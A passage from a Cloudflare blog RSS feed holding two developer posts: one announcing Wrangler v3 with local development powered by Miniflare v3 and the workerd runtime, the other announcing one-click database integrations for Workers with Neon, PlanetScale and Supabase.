            </figure><p>For over a year now, we’ve been working to improve the Workers local development experience. Our goal has been to improve parity between users' local and production environments. This is important because it provides developers with a fully-controllable and easy-to-debug local testing environment, which leads to increased developer efficiency and confidence.</p><p>To start, we integrated <a href="https://github.com/cloudflare/miniflare">Miniflare</a>, a fully-local simulator for Workers, directly <a href="/miniflare/">into Wrangler</a>, the Workers CLI. This allowed users to develop locally with Wrangler by running <code>wrangler dev --local</code>. Compared to the <code>wrangler dev</code> default, which relied on remote resources, this represented a significant step forward in local development. As good as it was, it couldn’t leverage the actual Workers runtime, which led to some inconsistencies and behavior mismatches.</p><p>Last November, we <a href="/miniflare-and-workerd/">announced the experimental version of Miniflare v3,</a> powered by the newly open-sourced <a href="https://github.com/cloudflare/workerd"><code>workerd</code> runtime</a>, the same runtime used by Cloudflare Workers. Since then, we’ve continued to improve upon that experience both in terms of accuracy with the real runtime and in cross-platform compatibility.</p><p>As a result of all this work, we are proud to announce the release of Wrangler v3 – the first version of Wrangler with local-by-default development.</p>
    <div>
      <h2>A new default for Wrangler</h2>
      <a href="#a-new-default-for-wrangler">
        
      </a>
    </div>
    <p>Starting with Wrangler v3, when you run <code>wrangler dev</code>, Miniflare v3 runs your Worker locally. This local development environment is effectively as accurate as a production Workers environment, giving you the ability to test every aspect of your application before deploying. It provides the same runtime and bindings, but has its own simulators for KV, R2, D1, Cache and Queues. Because you’re running everything on your machine, you won’t be billed for operations on KV namespaces or R2 buckets during development, and you can try out paid features like Durable Objects for free.</p><p>In addition to a more accurate developer experience, you should notice performance differences. Compared to remote mode, we’re seeing a 10x reduction in startup times and a 60x reduction in script reload times with the new local-first implementation. This massive reduction in reload times drastically improves developer velocity!</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3iwuiO3yvOuQQLFa9DbQZU/21379c38d9ce9a73e0f7a1c6eb8fbfb4/image4-12.png" />
            
            </figure><p>Remote development isn’t going anywhere. We recognise many developers still prefer to test against real data, or want to test Cloudflare services like <a href="https://developers.cloudflare.com/images/image-resizing/resize-with-workers">image resizing</a> that aren’t implemented locally yet. To run <code>wrangler dev</code> on Cloudflare’s network, just like previous versions, use the new <code>--remote</code> flag.</p>
    <div>
      <h2>Deprecating Miniflare v2</h2>
      <a href="#deprecating-miniflare-v2">
        
      </a>
    </div>
    <p>For users of Miniflare updating from v2 to v3, there are two important changes. First, if you’ve been using Miniflare’s CLI directly, you’ll need to switch to <code>wrangler dev</code>, as Miniflare v3 no longer includes a CLI. Second, if you’re using Miniflare’s API directly, upgrade to <code>miniflare@3</code> and follow the <a href="https://miniflare.dev/get-started/migrating">migration guide</a>.</p>
    <div>
      <h2>How we built Miniflare v3</h2>
      <a href="#how-we-built-miniflare-v3">
        
      </a>
    </div>
    <p>Miniflare v3 is now built using <code>workerd</code>, the open-source Cloudflare Workers runtime. As <code>workerd</code> is a server-first runtime, every configuration defines at least one socket to listen on. Each socket is configured with a service, which can be an external server, a disk directory, or, most importantly for us, a Worker! To start a <code>workerd</code> server running a Worker, create a <code>worker.capnp</code> file as shown below, run <code>npx workerd serve worker.capnp</code> and visit <a href="http://localhost:8080">http://localhost:8080</a> in your browser:</p>
            <pre><code>using Workerd = import "/workerd/workerd.capnp";


const helloConfig :Workerd.Config = (
 services = [
   ( name = "hello-worker", worker = .helloWorker )
 ],
 sockets = [
   ( name = "hello-socket", address = "*:8080", http = (), service = "hello-worker" )
 ]
);


const helloWorker :Workerd.Worker = (
 modules = [
   ( name = "worker.mjs",
     esModule =
       `export default {
       `  async fetch(request, env, ctx) {
       `    return new Response("Hello from workerd! 👋");
       `  }
       `}
   )
 ],
 compatibilityDate = "2023-04-04",
);</code></pre>
            <p>If you’re interested in what else <code>workerd</code> can do, check out the <a href="https://github.com/cloudflare/workerd/tree/main/samples">other samples</a>. Whilst <code>workerd</code> provides the runtime and bindings, it doesn’t provide the underlying implementations for the other products in the Developer Platform. This is where Miniflare comes in! It provides simulators for KV, R2, D1, Queues and the Cache API.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/44vdcPO7sdaTtBi0u0HMgE/85e6510a0f8689284add4318e09c4c2c/image1-43.png" />
            
            </figure>
    <div>
      <h3>Building a flexible storage system</h3>
      <a href="#building-a-flexible-storage-system">
        
      </a>
    </div>
    <p>As you can see from the diagram above, most of Miniflare’s job is now providing different interfaces for data storage. In Miniflare v2, we used a custom key-value store to back these, but this had <a href="https://github.com/cloudflare/miniflare/issues/167">a</a> <a href="https://github.com/cloudflare/miniflare/issues/247">few</a> <a href="https://github.com/cloudflare/miniflare/issues/530">limitations</a>. For Miniflare v3, we’re now using the industry-standard <a href="https://sqlite.org/index.html">SQLite</a>, with a separate blob store for KV values, R2 objects, and cached responses. Using SQLite gives us much more flexibility in the queries we can run, allowing us to support future unreleased storage solutions. 👀</p><p>A separate blob store allows us to provide efficient, ranged, <a href="https://streams.spec.whatwg.org/#example-rbs-pull">streamed access</a> to data. Blobs have unguessable identifiers, can be deleted, but are otherwise immutable. These properties make it possible to perform atomic updates with the SQLite database. No other operations can interact with the blob until it's committed to SQLite, because the ID is not guessable, and we don't allow listing blobs. For more details on the rationale behind this, check out the <a href="https://github.com/cloudflare/miniflare/discussions/525">original GitHub discussion</a>.</p>
    <div>
      <h3>Running unit tests inside Workers</h3>
      <a href="#running-unit-tests-inside-workers">
        
      </a>
    </div>
    <p>One of Miniflare’s primary goals is to provide a great local testing experience. Miniflare v2 provided <a href="https://miniflare.dev/testing/vitest">custom environments</a> for popular Node.js testing frameworks that allowed you to run your tests <i>inside</i> the Miniflare sandbox. This meant you could import and call any function using Workers runtime APIs in your tests. You weren’t restricted to integration tests that just send and receive HTTP requests. In addition, these environments provide per-test isolated storage, automatically undoing any changes made at the end of each test.</p><p>In Miniflare v2, these environments were relatively simple to implement. We’d already reimplemented Workers Runtime APIs in a Node.js environment, and could inject them using Jest and Vitest’s APIs into the global scope.</p>
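<p>A sketch of that injection pattern, with hypothetical names (the real Miniflare v2 environments are considerably more involved): a custom test environment assigns the simulated runtime APIs onto the global scope before each test and restores whatever it shadowed afterwards.</p>

```javascript
// Sketch of the Miniflare v2 approach: inject simulated Workers APIs
// into the global scope, and undo the changes on teardown so each
// test stays isolated. Shapes are illustrative, not Miniflare's code.
function createMiniflareEnvironment(simulatedGlobals) {
  return {
    name: "miniflare-sketch",
    setup(global) {
      const previous = {};
      for (const [key, value] of Object.entries(simulatedGlobals)) {
        previous[key] = global[key]; // remember what we shadowed
        global[key] = value;         // e.g. caches, HTMLRewriter, bindings
      }
      return {
        teardown(global) {
          for (const [key, value] of Object.entries(previous)) {
            global[key] = value;     // restore the original globals
          }
        },
      };
    },
  };
}
```

<p>Because everything ran in one Node.js process, "injection" really was just property assignment on the global object, which is exactly what stops working once the runtime lives in a separate <code>workerd</code> process.</p>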
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6UrAr6zl1SsIbG2Qyvq1p2/40113914d049e7ad928c16373dab7fa7/image3-13.png" />
            
            </figure><p>For Miniflare v3, this is much trickier. The runtime APIs are implemented in a separate <code>workerd</code> process, and you can’t reference JavaScript classes across a process boundary. So we needed a new approach…</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/44s7Z0ZD3r5hQpdCxr1atZ/8b1d395872b13a1123cf77e25ab07533/image7-7.png" />
            
            </figure><p>Many test frameworks like Vitest use Node’s built-in <a href="https://nodejs.org/api/worker_threads.html"><code>worker_threads</code></a> module for running tests in parallel. This module spawns new operating system threads running Node.js and provides a <code>MessageChannel</code> interface for communicating between them. What if instead of spawning a new OS thread, we spawned a new <code>workerd</code> process, and used WebSockets for communication between the Node.js host process and the <code>workerd</code> “thread”?</p>
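<p>The core of that substitution can be sketched as a small adapter that gives a WebSocket-style connection the <code>postMessage</code>/<code>"message"</code> surface of a <code>MessagePort</code>. This is purely illustrative of the idea, not the actual bridge:</p>

```javascript
// Sketch: wrap a WebSocket-like object (with send() and onmessage) so it
// looks like the postMessage/"message" interface worker_threads provides,
// letting the Node.js host talk to a workerd "thread" the same way it
// would talk to an OS thread.
class SocketMessagePort {
  constructor(socket) {
    this.socket = socket;
    this.listeners = [];
    // Surface incoming frames as decoded "message" events.
    socket.onmessage = (event) => {
      const data = JSON.parse(event.data);
      for (const listener of this.listeners) listener(data);
    };
  }
  postMessage(data) {
    // Structured clone doesn't cross a process boundary, so this sketch
    // serializes to JSON; a real bridge would need richer serialization.
    this.socket.send(JSON.stringify(data));
  }
  on(event, listener) {
    if (event === "message") this.listeners.push(listener);
  }
}
```

<p>Anything written against the <code>MessagePort</code>-style interface then works unchanged, whether the other end is an OS thread or a separate <code>workerd</code> process.</p>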
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5jGThLJfIpVq47I9KaxaS3/86a1ff8b9739f21e6629eb8f8b793ffa/image8-8.png" />
            
            </figure><p>We have a proof of concept using Vitest showing this approach can work in practice. Existing Vitest IDE integrations and the Vitest UI continue to work without any additional work. We aren’t quite ready to release this yet, but will be working on improving it over the next few months. Importantly, the <code>workerd</code> “thread” needs access to Node.js built-in modules, which we recently started <a href="/workers-node-js-asynclocalstorage/">rolling out support for</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/HqXRYKmlaionjMJK7PW6i/974cb97c5b694db5c3f567f628d861ed/image2-23.png" />
            
            </figure>
    <div>
      <h3>Running on every platform</h3>
      <a href="#running-on-every-platform">
        
      </a>
    </div>
    <p>We want developers to have this great local testing experience, regardless of which operating system they’re using. Before it was open-sourced, the Cloudflare Workers runtime was designed to run only on Linux. For Miniflare v3, we needed to add support for macOS and Windows too. macOS and Linux are both Unix-based, making porting between them relatively straightforward. Windows, on the other hand, is an entirely different beast… 😬</p><p>The <code>workerd</code> runtime uses <a href="https://github.com/capnproto/capnproto/tree/master/c%2B%2B/src/kj">KJ</a>, an alternative C++ base library, which is already cross-platform. We’d also migrated to the <a href="https://bazel.build/">Bazel</a> build system in preparation for open-sourcing the runtime, which has good Windows support. When compiling our C++ code for Windows, we use LLVM's MSVC-compatible compiler driver <a href="https://llvm.org/devmtg/2014-04/PDFs/Talks/clang-cl.pdf"><code>clang-cl</code></a>, as opposed to using Microsoft’s Visual C++ compiler directly. This enables us to use the "same" compiler frontend on Linux, macOS, and Windows, massively reducing the effort required to compile <code>workerd</code> on Windows. Notably, this provides proper support for <code>#pragma once</code> when using symlinked virtual includes produced by Bazel, <code>__atomic_*</code> functions, a standards-compliant preprocessor, GNU statement expressions used by some KJ macros, and understanding of the <code>.c++</code> extension by default. After switching out <a href="https://github.com/mrbbot/workerd/blob/5e10e308e6683f8f88833478801c07da4fe01063/src/workerd/server/workerd.c%2B%2B#L802-L808">Unix API calls for their Windows equivalents</a> using <code>#if _WIN32</code> preprocessor directives, and fixing a bunch of segmentation faults caused by execution order differences, we were finally able to get <code>workerd</code> running on Windows! No WSL or Docker required! 🎉</p>
    <div>
      <h2>Let us know what you think!</h2>
      <a href="#let-us-know-what-you-think">
        
      </a>
    </div>
    <p>Wrangler v3 is now generally available! Upgrade by running <code>npm install --save-dev wrangler@3</code> in your project. Then run <code>npx wrangler dev</code> to try out the new local development experience powered by Miniflare v3 and the open-source Workers runtime. Let us know what you think in the <code>#wrangler</code> channel on the <a href="https://discord.com/invite/cloudflaredev">Cloudflare Developers Discord</a>, and please <a href="https://github.com/cloudflare/workers-sdk/issues/new/choose">open a GitHub issue</a> if you hit any unexpected behavior.</p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Wrangler]]></category>
            <category><![CDATA[Miniflare]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <guid isPermaLink="false">6XGVmk1ZbylTfVULuFs2jk</guid>
            <dc:creator>Brendan Coll</dc:creator>
            <dc:creator>Adam Murray</dc:creator>
        </item>
        <item>
            <title><![CDATA[Announcing database integrations: a few clicks to connect to Neon, PlanetScale and Supabase on Workers]]></title>
            <link>https://blog.cloudflare.com/announcing-database-integrations/</link>
            <pubDate>Tue, 16 May 2023 13:05:00 GMT</pubDate>
            <description><![CDATA[ Today we’re announcing Database Integrations – making it seamless to connect to your database of choice on Workers. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog post references a feature whose documentation has since been updated. For the latest reference content, visit </i><a href="https://developers.cloudflare.com/workers/databases/third-party-integrations/"><i>https://developers.cloudflare.com/workers/databases/third-party-integrations/</i></a></p><p>One of the best feelings as a developer is seeing your idea come to life. You want to move fast, and Cloudflare’s developer platform gives you the tools to take your applications from 0 to 100 within minutes.</p><p>One thing that we’ve heard slows developers down is the question: <i>“What databases can be used with Workers?”</i> Developers stumble when it comes to finding the databases that Workers can connect to, choosing a library or driver that's compatible with Workers, and translating boilerplate examples into something that can run on our developer platform.</p><p>Today we’re announcing Database Integrations – making it seamless to connect to your database of choice on Workers. To start, we’ve added some of the most popular databases that support HTTP connections: <a href="https://neon.tech/">Neon</a>, <a href="https://planetscale.com/">PlanetScale</a> and <a href="https://supabase.com/">Supabase</a>, with more (like Prisma, Fauna, MongoDB Atlas) to come!</p>
    <div>
      <h2>Focus more on code, less on config</h2>
      <a href="#focus-more-on-code-less-on-config">
        
      </a>
    </div>
    <p>Our <a href="https://www.cloudflare.com/developer-platform/products/d1/">serverless SQL database</a>, D1, launched in open alpha last year, and we’re continuing to invest in making it production ready (stay tuned for an exciting update later this week!). We also recognize that there are plenty of flavours of databases, and we want developers to have the freedom to select what’s best for them and pair it with our powerful compute offering.</p><p>On the second day of Developer Week 2023, data is in the spotlight. We’re taking huge strides in making it possible and more performant to connect to databases from Workers (spoiler alert!):</p><ul><li><p><a href="/workers-tcp-socket-api-connect-databases">Announcing connect() — a new API for creating TCP sockets from Cloudflare Workers</a></p></li><li><p><a href="/announcing-database-integrations">Smart Placement speeds up applications by moving code close to your backend — no config needed</a></p></li></ul><p>Making it possible and performant is just the start; we also want to make connecting to databases painless. Databases have specific protocols, drivers, APIs and vendor-specific features that you need to understand in order to get up and running. With Database Integrations, we want to make this process foolproof.</p><p>Whether you’re working on your first project or your hundredth project, you should be able to connect to your database of choice with your eyes closed. With Database Integrations, you can spend less time focusing on configuration and more on doing what you love – building your applications!</p>
    <div>
      <h2>What does this experience look like?</h2>
      <a href="#what-does-this-experience-look-like">
        
      </a>
    </div>
    
    <div>
      <h3>Discoverability</h3>
      <a href="#discoverability">
        
      </a>
    </div>
    <p>If you’re starting a project from scratch or want to connect Workers to an existing database, you want to know <i>“What are my options?”</i></p><p>Workers supports connections to a wide array of database providers over HTTP. With the newly released <a href="/workers-tcp-socket-api-connect-databases">outbound TCP support</a>, the list of databases that you can connect to from Workers will only grow!</p><p>In the new “Integrations” tab, you’ll be able to view all the databases that we support and add an integration to your Worker directly from there. To start, we have support for Neon, PlanetScale and Supabase, with many more coming soon.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/72AInQBXAsWNkEcBr3DPeo/3c546a2d7e2cfdf403ffac91154f172a/image2-10.png" />
            
            </figure>
    <div>
      <h3>Authentication</h3>
      <a href="#authentication">
        
      </a>
    </div>
    <p>You should never have to copy and paste your database credentials or other parts of the connection string.</p><p>Once you hit “Add Integration”, we take you through an OAuth2 flow that automatically fetches the right configuration values from your database provider and adds them as encrypted environment variables to your Worker.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4DKr9USRBKD90foCkyPkLM/b9bedf4c535ed33c1b42bdc176f066c3/integration-flow.png" />
            
            </figure><p>Once you have credentials set up, check out our <a href="https://developers.cloudflare.com/workers/learning/integrations/databases/#native-database-integrations-beta">documentation</a> for examples on how to get started using the data platform’s client library. What’s more – we have templates coming that will allow you to get started even faster!</p><p>That’s it! With database integrations, you can connect your Worker with your database in just a few clicks. Head to your Worker &gt; Settings &gt; Integrations to try it out today.</p>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>We’ve only just scratched the surface with Database Integrations, and there’s a ton more coming soon!</p><p>While we’ll continue to add support for more popular data platforms, we also know that it’s impossible for us to keep up with a constantly moving landscape. We’ve been working on an integrations platform so that any database provider can easily build their own integration with Workers. As a developer, this means that you can start tinkering with the next new database right away on Workers.</p><p>Additionally, we’re working on adding Wrangler support, so you can create integrations directly from the CLI. We’ll also be adding support for account-level environment variables so that you can share integrations across the Workers in your account.</p><p>We’re really excited about the potential here, and we can’t wait to see all the new creations from our developers! Be sure to join <a href="https://discord.gg/cloudflaredev">Cloudflare’s Developer Discord</a> and share your projects. Happy building!</p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Latin America]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Database]]></category>
            <category><![CDATA[Internet Performance]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <guid isPermaLink="false">bAEI0IEwgtOSNAWKw64Zl</guid>
            <dc:creator>Shaun Persad</dc:creator>
            <dc:creator>Emily Chen</dc:creator>
            <dc:creator>Tanushree Sharma</dc:creator>
        </item>
    </channel>
</rss>